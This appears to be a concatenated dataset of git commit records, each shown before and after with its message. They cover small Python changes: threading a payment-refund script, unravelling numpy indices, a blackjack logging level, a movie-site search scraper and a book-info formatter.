import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
Use threaded_map to speed up refunds#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| <commit_before>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
<commit_msg>Use threaded_map to speed up refunds<commit_after>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
|
0cb87e52f91c85ec99b58f2795c7762354531e7c | python/assemble_BFs.py | python/assemble_BFs.py | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| Unravel index for argmin of array | Unravel index for argmin of array
| Python | bsd-3-clause | mirams/PyHillFit,mirams/PyHillFit,mirams/PyHillFit | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
Unravel index for argmin of array | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| <commit_before>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
<commit_msg>Unravel index for argmin of array<commit_after> | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
Unravel index for argmin of arrayimport doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| <commit_before>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
<commit_msg>Unravel index for argmin of array<commit_after>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
|
dbf0fb82263005d90a84ff9011da9849d0a3d0f3 | cards/bjcard.py | cards/bjcard.py | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
| """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| Change log message to debug | Change log message to debug
| Python | mit | johnpapa2/twenty-one,johnpapa2/twenty-one | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
Change log message to debug | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| <commit_before>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
<commit_msg>Change log message to debug<commit_after> | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
Change log message to debug"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| <commit_before>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
<commit_msg>Change log message to debug<commit_after>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
|
70808dfd53c5a5760a13252a72caf229793e8225 | crawl.py | crawl.py | import urllib2;
from bs4 import BeautifulSoup;
| import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| Add search method to find the movies/series home url | Add search method to find the movies/series home url
| Python | mit | raztechs/py-video-crawler | import urllib2;
from bs4 import BeautifulSoup;
Add search method to find the movies/series home url | import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| <commit_before>import urllib2;
from bs4 import BeautifulSoup;
<commit_msg>Add search method to find the movies/series home url<commit_after> | import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| import urllib2;
from bs4 import BeautifulSoup;
Add search method to find the movies/series home urlimport urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| <commit_before>import urllib2;
from bs4 import BeautifulSoup;
<commit_msg>Add search method to find the movies/series home url<commit_after>import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
|
e03bc2013adb21154a1fc2b4737d92f649325154 | utils.py | utils.py | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
| import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| Create a new string, instead of modifying the `template` | Create a new string, instead of modifying the `template`
| Python | mit | avinassh/Laozi,avinassh/Laozi | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
Create a new string, instead of modifying the `template` | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| <commit_before>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
<commit_msg>Create a new string, instead of modifying the `template`<commit_after> | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
Create a new string, instead of modifying the `template`import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| <commit_before>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
<commit_msg>Create a new string, instead of modifying the `template`<commit_after>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
|
